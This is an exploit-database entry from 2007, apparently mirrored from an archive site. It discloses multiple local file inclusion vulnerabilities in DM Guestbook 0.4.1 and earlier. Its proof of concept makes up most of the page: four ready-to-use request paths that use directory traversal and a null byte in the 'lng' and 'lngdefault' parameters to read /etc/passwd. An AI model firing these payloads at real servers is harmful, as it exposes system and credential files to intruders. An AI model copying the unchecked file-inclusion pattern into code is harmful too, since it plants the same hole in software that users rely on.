DM Guestbook <= 0.4.1 Multiple Local File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DM Guestbook <= 0.4.1 Multiple Local File Inclusion Vulnerabilities
# Published : 2007-11-02
# Author : GoLd_M
# Previous Title : Scribe <= 0.2 Remote PHP Code Execution Vulnerability
# Next Title : Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vuln

#  DM Guestbook <= 0.4.1 Multiple Local File Include Vulnerabilities
#  http://sourceforge.net/project/showfiles.php?group_id=101364 /guestbook.0.4.1/
#  POC :
#  /guestbook.php?lng=../../../../../../../etc/passwd%00
#  /admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00
#  /auto/glob_new.php?lng=../../../../../../../etc/passwd%00
#  /auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00

# www.Syue.com [2007-11-02]